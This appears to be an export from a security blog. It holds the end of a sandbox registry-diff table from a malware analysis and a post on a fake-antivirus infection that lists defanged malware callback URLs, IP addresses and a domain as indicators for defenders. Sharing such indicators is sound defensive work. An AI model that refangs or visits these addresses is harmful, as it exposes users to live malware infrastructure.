<td><span style="color: black; font-size: xx-small;">hex:09,00,00,00,0b,00,56,00,00,00,54,00,31,00,00,00,00,00,36,41,48,7e,11,00,50,72,6f,67,72,61,6d,73,00,00,3c,00,03,00,04,00,ef,be,36,41,40,7e,36,41,48,7e,14,00,26,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,73,00,00,00,40,73,68,65,6c,6c,33,32,2e,64,6c,6c,2c,2d,32,31,37,38,32,00,18,00,00,00,01,d4,00,00,00,d2,00,32,00,23,03,00,00,36,41,48,7e,20,00,49,4e,54,45,52,4e,7e,31,2e,4c,4e,4b,00,00,42,00,03,00,04,00,ef,be,36,41,48,7e,36,41,48,7e,14,00,00,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,74,00,00,00,0b,00,ef,be,00,00,00,00,00,00,00,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,5c,00,49,00,45,00,58,00,50,00,4c,00,4f,00,52,00,45,00,2e,00,45,00,58,00,45,00,00,00,00,00,1c,00,00,00,01,dc,00,00,00,da,00,32,00,e2,02,00,00,36,41,24,83,20,00,4f,55,54,4c,4f,4f,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:09,00,00,00,0b,00,56,00,00,00,54,00,31,00,00,00,00,00,36,41,48,7e,11,00,50,72,6f,67,72,61,6d,73,00,00,3c,00,03,00,04,00,ef,be,36,41,40,7e,36,41,48,7e,14,00,26,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,73,00,00,00,40,73,68,65,6c,6c,33,32,2e,64,6c,6c,2c,2d,32,31,37,38,32,00,18,00,00,00,01,d4,00,00,00,d2,00,32,00,23,03,00,00,36,41,48,7e,20,00,49,4e,54,45,52,4e,7e,31,2e,4c,4e,4b,00,00,42,00,03,00,04,00,ef,be,36,41,48,7e,36,41,48,7e,14,00,00,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,2e,00,6c,00,6e,00,6b,00,00,00,1c,00,74,00,00,00,0b,00,ef,be,00,00,00,00,00,00,00,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00,6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,49,00,6e,00,74,00,65,00,72,00,6e,00,65,00,74,00,20,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00,72,00,5c,00,49,00,45,00,58,00,50,00,4c,00,4f,00,52,00,45,00,2e,00,45,00,58,00,45,00,00,00,00,00,1c,00,00,00,01,dc,00,00,00,da,00,32,00,e2,02,00,00,36,41,24,83,20,00,4f,55,54,4c,4f,4f,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage</span></td>
<td><span style="color: black; font-size: xx-small;">StartMenu_Balloon_Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:b0,27,b0,17,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:f0,f5,4b,1c,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,10,00,00,00,50,e8,07,19,df,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,14,00,00,00,90,71,d8,1e,e0,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU:P:\JVAQBJF\flfgrz32\pzq.rkr</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,d0,cf,da,d9,de,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,90,2d,68,fb,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count</span></td>
<td><span style="color: black; font-size: xx-small;">HRZR_EHACNGU:P:\Cebtenz Svyrf\Vagrearg Rkcybere\VRKCYBER.RKR</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,08,00,00,00,b0,e4,6a,a6,dd,98,cd,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:01,00,00,00,09,00,00,00,d0,f4,ef,4e,df,98,cd,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,80,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Type</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Flags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,22,00,00,00,44,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{25336920-03F9-11CF-8FD0-00AA00686F13}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000004</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000005</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{25336920-03F9-11CF-8FD0-00AA00686F13}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,10,00,35,00,e0,03,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,1e,00,05,00,51,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CFBFAE00-17A6-11D0-99CB-00C04FD64497}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,05,00,0b,00,3c,02,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,1c,00,26,00,a0,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000007</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,28,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,b0,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{DBC80044-A445-435B-BC74-9C25C1C588A9}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">LoadTime</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000088</span></td>
<td><span style="color: black; font-size: xx-small;">dword:0000009d</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000004</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E2E2DD38-D088-4134-82B7-F2BA38496583}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,10,00,2a,00,c6,03,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,1c,00,22,00,04,01,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Count</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000007</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}\iexplore</span></td>
<td><span style="color: black; font-size: xx-small;">Time</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,10,00,2b,00,ab,01,</span></td>
<td><span style="color: black; font-size: xx-small;">hex:dc,07,09,00,06,00,16,00,10,00,1f,00,0f,00,50,02,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@xpsp1res.dll,-11005</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Sends and receives e-mail and newsgroup messages."</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\Program Files\Wireshark\wireshark.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Wireshark"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\Program Files\Common Files\Java\Java Update\jucheck.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Java(TM) Update Checker"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\Program Files\Windows Media Player\setup_wm.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Microsoft Windows Media Configuration Utility"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\taskmgr.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows TaskManager"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\WINDOWS\explorer.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Explorer"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@xpsp3res.dll,-20000</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Network Diagnostics for Windows XP"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@shell32.dll,-12691</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"My Recent Documents"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">@C:\WINDOWS\system32\SHELL32.dll,-9217</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"My Network Places"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\WINDOWS\inf\unregmp2.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Microsoft Windows Media Player Setup Utility"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\Program Files\Windows Media Player\wmplayer.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Media Player"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\General</span></td>
<td><span style="color: black; font-size: xx-small;">UniqueID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{ECE4B67E-5176-48A8-A4E7-7CD222821F18}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\General</span></td>
<td><span style="color: black; font-size: xx-small;">ComputerName</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"SANDBOX"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\General</span></td>
<td><span style="color: black; font-size: xx-small;">VolumeSerialNumber</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:20d334b5</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace</span></td>
<td><span style="color: black; font-size: xx-small;">LocalBase</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML"</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.XML"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace</span></td>
<td><span style="color: black; font-size: xx-small;">DTDFile</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.DTD"</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNS.DTD"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace</span></td>
<td><span style="color: black; font-size: xx-small;">LocalDelta</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSD.XML"</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSD.XML"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Windows Media\WMSDK\Namespace</span></td>
<td><span style="color: black; font-size: xx-small;">RemoteDelta</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSR.XML"</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Documents and Settings\bomber\Local Settings\Application Data\Microsoft\Windows Media\9.0\WMSDKNSR.XML"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\PROGRA~1\WINDOW~2\wmplayer.exe"</span></td>
<td><span style="color: black; font-size: xx-small;">"Yes"</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications</span></td>
<td><span style="color: black; font-size: xx-small;">C:\PROGRA~1\WINDOW~2\wmplayer.exe</span></td>
<td><span style="color: black; font-size: xx-small;">"Yes"</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications</span></td>
<td><span style="color: black; font-size: xx-small;">"C:\Program Files\Windows Media Player\wmplayer.exe"</span></td>
<td><span style="color: black; font-size: xx-small;">"Yes"</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Netscape\Netscape Navigator\User Trusted External Applications</span></td>
<td><span style="color: black; font-size: xx-small;">C:\Program Files\Windows Media Player\wmplayer.exe</span></td>
<td><span style="color: black; font-size: xx-small;">"Yes"</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\SessionInformation</span></td>
<td><span style="color: black; font-size: xx-small;">ProgramCount</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000005</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\ShellNoRoam\MUICache</span></td>
<td><span style="color: black; font-size: xx-small;">C:\WINDOWS\explorer.exe</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Explorer"</span></td>
</tr>
</tbody></table>
<br />
Hope you found this informative.
<br />
<br />Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com3tag:blogger.com,1999:blog-407866255126559296.post-40574882468726062552012-09-15T14:44:00.003-07:002012-09-15T14:45:37.708-07:00Fake AV Strain - New URL CallbacksI have observed a new fake AV strain in the wild at a site that does not have Layer 7 forensics. They do, however, have full URL logging which enabled me to backtrack the events and callouts to what appears to be a total of 15 separate sites. The common string among them appears to be that many of them are <span style="font-family: 'Courier New', monospace; font-size: 13px;">Registrar: BIZCN.COM, INC.</span><br />
<br />
The malware in this case was very noisy to the user, changed attributes to hidden on all files in the system and changed GP settings.<br />
<br />
The infection point in the case I investigated was a random ftp1.biz website. The user searched online for a specific type of weight lifting technique, was redirected from a legitimate page to the ftp1.biz and hit with an exploit kit of unknown type which was successful.<br />
<br />
What was interesting in this case is two points:<br />
1. Once the user ran combofix, malwarebytes and Windows updates on their workstation, the system appears to call back out through a series of different octet-stream requests.<br />
2. The URLs follow a pattern that appears to be new (fresh in the last 2 days according to urlquery.net).<br />
<br />
Here are the URLs in order, in case anyone else runs into them.<br />
<br />
hxxp://108.178.59.39/links/reveals_formed.php<br />
<br />
Some in formation on this URL exists in urlquery. The researched links here have contained only two direct to IP requests, 174.140.166.71 and 46.249.37.122.<br />
<br />
<br />
http://urlquery.net/report.php?id=177843<br />
http://urlquery.net/report.php?id=177013<br />
<br />
<br />
<br />
hxxp://108.178.59.39/links/reveals_formed.php?udvf=03080407333603030a3302340235073836093508033706363836353505080833&tvaxpmbue=0a09380b0a3508360208&rdm=02&bnvru=dolz&gwxjfli=ewsxs<br />
<br />
hxxp://108.178.59.39/links/reveals_formed.php?iwzwf=03080407333603030a3302340235073836093508033706363836353505080833&biwoe=03090708363335340408&qymzixvp=02&amoo=vypv&kcdo=ljyuum<br />
<br />
hxxp://108.178.59.39/links/reveals_formed.php?psgm=03080407333603030a3302340235073836093508033706363836353505080833&ygxrse=333d&xfkcr=iqu&rhdays=ewmp<br />
<br />
hxxp://108.178.59.39/links/reveals_formed.php?psgm=03080407333603030a3302340235073836093508033706363836353505080833&ygxrse=333d&xfkcr=iqu&rhdays=ewmp<br />
<br />
hxxp://108.178.59.39/links/reveals_formed.php?yxuaovb=03080407333603030a3302340235073836093508033706363836353505080833&cgqua=47&jgysdt=030907083633353404080c0c0a09380b0a3508360208&hwalpqs=0302000200020002<br />
<br />
hxxp://108.178.59.39/links/reveals_formed.php?psgm=03080407333603030a3302340235073836093508033706363836353505080833&ygxrse=333d&xfkcr=iqu&rhdays=ewmp<br />
<br />
The next URL is indiciative of known Fake AV Urls<br />
<br />
hxxp://175.41.28.157/api/urls/?ts=3e73d632&affid=60830<br />
<br />
As seen, for example, here:<br />
http://urlquery.net/report.php?id=177167<br />
<br />
<br />
hxxp://report.o7o3179a1k931wsk.com/?Y93o31=%96%C6%D3%A5%D4%D6a%D0n%A4%94%95ji%C2i%CF%9C%98e%DD%A3%A2g%9C%A7%CF%8Al%98%A2%98%95%98%DC%E6%AC%E9%EA%86%BF%5D%E4%9C%95tn%99f%9E_%9F%9F%DE%B0%D0%9C%90%C4%C0%7F%A6%9C%D3pu%A3%A7%A7%A4%A5%A5%60%B5m%A8hh%7C%7B%93d%A3~dd%B9%A7%AFa%A5%A0%9F%92iu%A0Y%A3%D7%D8%AD%9F%A2%A4%5E%9Fj%A0cagi%92a%9Bica%A7%A3%9BT%D9%AC%9D%89ic%9Fdf%AB%89<br />
<br />
hxxp://report.o7o3179a1k931wsk.com/?Y31716=%96%C6%D3%A5%D4%D6a%D0n%A4%94%95ji%C2i%CF%9C%98e%DD%A3%A2g%9C%A7%CF%8Af%96j%96%9A%98%DC%E6%AC%E9%EA%86%BF%5D%E4%9C%95tn%99f%9E_%9F%9F%DE%B0%D0%9C%90%C4%C0%7F%A0%9A%9Bnz%A3%A7%A7%A4%A5%A5%60%B5m%A8hh%7C%7B%93d%A3~dd%B9%A7%AFa%A5%A0%9F%92cshW%A8%D7%D8%AD%A0%A2%A4%5E%9Fh%A5cagi%92a%9Bica%A7%A3%9BT%D9%AC%9D%89cagbk%AB%89<br />
<br />
hxxp://report.o7o3179a1k931wsk.com/?Q31717=%96%C6%D3%A5%D4%D6a%D0n%A4%94%95ji%C2i%CF%9C%98e%DD%A3%A2g%9C%A7%CF%82f%96j%96%9B%98%DC%E6%AC%E9%EA%86%BF%5D%E4%9C%95tn%99f%9E_%9F%9F%DE%B0%D0%9C%90%C4%C0w%A0%9A%9Bn%7B%A3%A7%A7%A4%A5%A5%60%B5m%A8hh%7C%7B%93d%A3~dd%B9%A7%AFa%A5%A0%9F%8AcshW%A9%D7%D8%AD%A0%A2%A4%5E%9Fh%A6cagi%92a%9Bica%A7%A3%9BT%D9%AC%9D%81cagbl%AB%89<br />
<br />
